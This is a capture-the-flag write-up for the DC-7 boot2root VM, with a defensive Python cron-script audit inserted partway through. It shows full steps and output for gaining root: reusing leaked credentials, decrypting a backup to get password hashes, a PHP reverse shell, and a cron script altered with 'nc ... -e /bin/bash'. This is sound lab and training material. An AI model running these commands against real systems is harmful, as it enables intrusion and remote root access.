I'm back again to present another boot2root VM to you. This time I bring you DC:7.
This machine was released on August 31, 2019, and can be downloaded at DC:7.
If you missed the DC:6 writeup, just go HERE!
Without further ado, let's get to what matters!
As always, we start with host discovery:
```
$ netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:14      1      60  Unknown vendor
 192.168.56.100  08:00:27:10:55:06      2     120  PCS Systemtechnik GmbH
 192.168.56.107  08:00:27:42:8e:99      1      60  PCS Systemtechnik GmbH
```
Now that we have identified our target, we can find out which services this host exposes:
```
$ nmap -sS -sV -sC -Pn -p- 192.168.56.107
Nmap scan report for 192.168.56.107
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 08:00:27:42:8E:99 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds
```
Only the SSH and HTTP services are available on the target. With that, let's begin our analysis with the web application.
We can identify that it is a Drupal site. In addition, the home page mentions a Twitter account.
Visiting the GitHub account listed on the Twitter profile, we find a credential in the config.php file.
And using that credential, we can log in via SSH.
```
$ ssh dc7user@192.168.56.107
dc7user@192.168.56.107's password:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$
```
Time to look for a way to escalate privileges.
We identify a routine that dumps the database and encrypts the dump using GnuPG.
As we can see, we have read access to the backup script. However, only the root user and the www-data group have write access.
```
$ ls -l /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29  2019 /opt/scripts/backups.sh
dc7user@dc-7:~$
```
Let's check what magic the script does.
```
dc7user@dc-7:/opt/scripts$ cat backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
dc7user@dc-7:/opt/scripts$
```
Since this is symmetric encryption, we can use the same passphrase that is hardcoded in the script to decrypt the file and get access to the database dump.
```
dc7user@dc-7:~/backups$ gpg -d website.sql.gpg > ~/backup.sql
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
```
Knowing the Drupal version
```
dc7user@dc-7:~$ grep " VERSION " /var/www/html/core/lib/Drupal.php
  const VERSION = '8.7.6';
```
makes it easy to know which table to look for the existing users in.
```
dc7user@dc-7:~$ grep users_field_data backup.sql
...
INSERT INTO `users_field_data` VALUES (0,'en','en',NULL,'',NULL,NULL,'',0,1567054076,1567054076,0,0,NULL,1),
(1,'en','en',NULL,'admin','$S$Ead.KmIcT/yfKC.1H53aDPJasaD7o.ioEGiaPy1lLyXXAJC/Qi4F','admin@example.com','Australia/Melbourne',1,1567054076,1567054076,1567098850,1567098643,'admin@example.com',1),
(2,'en','en','en','dc7user','$S$EKe0kuKQvFhgFnEYMpq.mRtbl/TQ5FmEjCDxbu0HIHaO0/U.YFjI','dc7user@blah.com','Australia/Brisbane',1,1567057938,1567057938,0,0,'dc7user@blah.com',1);
```
We notice that drush is present on the machine (see the backup script), so we can change the admin user's password with it.
```
dc7user@dc-7:/var/www/html$ drush user-password admin --password="lcesteves"
Changed password for admin
```
Now that we have changed the password, we can log in to Drupal.
Since the PHP Filter module is not installed, we will have to install it manually.
After downloading it, the installation completed successfully.
We can now see the module available and installed.
All that's left is to go to Content > + Add Content > Basic Page and add a PHP reverse shell.
After changing the Text format to PHP code and clicking preview, the reverse connection is established.
```
root@kali:~# nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.107] 33716
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
 04:37:55 up 36 min,  1 user,  load average: 0.26, 0.17, 0.07
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dc7user  pts/0    192.168.56.102   04:03    9:39   0.05s  0.05s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")';
www-data@dc-7:/$ ^Z
[1]+  Stopped                 nc -nvlp 443
root@kali:~# stty raw -echo
root@kali:~# nc -nvlp 443

www-data@dc-7:/$ stty rows 33 cols 112
www-data@dc-7:/$ export TERM=screen
www-data@dc-7:/$ export SHELL=/bin/bash
www-data@dc-7:/$
```
We have access to the machine again, but now with the privileges of the www-data user.
Remember that only the root user and the www-data group had permission to edit the backup script? It's game over if that script is being run via cron as root.
We can confirm this using pspy64s.
Perfect! Now we just need to add a command to the script that opens a reverse connection back to us.
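The two weaknesses this box turns on are visible in the `ls -l` output and in the script body: a root-executed cron script that a lower-privileged group can write, and a GnuPG passphrase passed in cleartext on the command line. As an added example (not part of the original writeup or of the DC-7 VM), the Python audit below takes an `ls -l` line and a script body, both transcribed from the output above, and reports those two findings; a hypothetical hardened variant (root-only write, passphrase read from a root-only file via gpg's real `--passphrase-file` option) is shown alongside to produce a clean result. The `--passphrase` regex and the rule "group-writable by a group other than the owner" are this example's own assumptions.

```python
import re

# Constructed sample input, transcribed from the walkthrough's ls -l and cat output.
LS_LINE = "-rwxrwxr-x 1 root www-data 520 Aug 29 2019 /opt/scripts/backups.sh"
SCRIPT = """#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
"""

# Hypothetical hardened counterpart (assumption, not from the VM): root:root, mode 755,
# passphrase read from a root-only file instead of appearing on the command line.
HARDENED_LS_LINE = "-rwxr-xr-x 1 root root 520 Aug 29 2019 /opt/scripts/backups.sh"
HARDENED_SCRIPT = SCRIPT.replace(
    "--passphrase PickYourOwnPassword", "--passphrase-file /root/.backup-passphrase"
)

# Matches "--passphrase VALUE" or "--passphrase=VALUE"; deliberately does not match
# "--passphrase-file" or "--passphrase-fd", which do not leak the secret to `ps`.
PASSPHRASE_RE = re.compile(r"--passphrase(?:=|\s+)(\S+)")


def parse_ls_line(line):
    """Split one `ls -l` line into mode, owner, group and path."""
    fields = line.split(None, 8)
    if len(fields) != 9:
        raise ValueError("unexpected ls -l format: %r" % line)
    mode, _links, owner, group, _size, _month, _day, _year, path = fields
    return {"mode": mode, "owner": owner, "group": group, "path": path}


def writable_by_non_owner(mode):
    """Return which classes besides the owner have write permission in a 10-char mode string."""
    who = []
    if mode[5] == "w":
        who.append("group")
    if mode[8] == "w":
        who.append("other")
    return who


def audit_cron_script(ls_line, script_text):
    """Return a list of human-readable findings for a script executed by the file's owner."""
    info = parse_ls_line(ls_line)
    findings = []
    for who in writable_by_non_owner(info["mode"]):
        if who == "group" and info["group"] == info["owner"]:
            continue  # root:root with g+w adds no extra writers
        principal = info["group"] if who == "group" else "everyone"
        findings.append(
            f"{info['path']} is writable by {who} ({principal}) but runs as {info['owner']}"
        )
    seen = set()
    for match in PASSPHRASE_RE.finditer(script_text):
        secret = match.group(1)
        if secret not in seen:  # report each distinct passphrase once
            seen.add(secret)
            findings.append(f"cleartext passphrase on gpg command line: {secret}")
    return findings


if __name__ == "__main__":
    for label, ls_line, body in (
        ("DC-7 as found", LS_LINE, SCRIPT),
        ("hardened (hypothetical)", HARDENED_LS_LINE, HARDENED_SCRIPT),
    ):
        print(label)
        for finding in audit_cron_script(ls_line, body) or ["no findings"]:
            print("  -", finding)
```

Running it prints two findings for the script as found on DC-7 and none for the hardened variant. On a real host the same checks apply to every script referenced from `/etc/crontab`, `/etc/cron.d/` and root's crontab; the `ls -l` parsing is only there so the example runs offline on the captured output.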
```
www-data@dc-7:/tmp$ cat /opt/scripts/backups.sh
#!/bin/bash
nc 192.168.56.102 4444 -e /bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
www-data@dc-7:/tmp$
```
And wait for the script to run.
```
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.107] 40218
python -c 'import pty;pty.spawn("/bin/bash")';
root@dc-7:~# ls -l
ls -l
total 4
-rw-r--r-- 1 root root 1079 Aug 30  2019 theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt
888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888

Congratulations!!!

Hope you enjoyed DC-7.  Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges.

I'm sending out an especially big thanks to:

@4nqr34z
@D4mianWayne
@0xmzfr
@theart42

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-7:~#
```
References:
https://www.drupal.org/docs/8/understanding-drupal-8/understanding-drupal-version-numbers/which-version-of-drupal-am-i
https://drushcommands.com/drush-8x/user/user-password/
https://www.sevenlayers.com/index.php/164-drupal-to-reverse-shell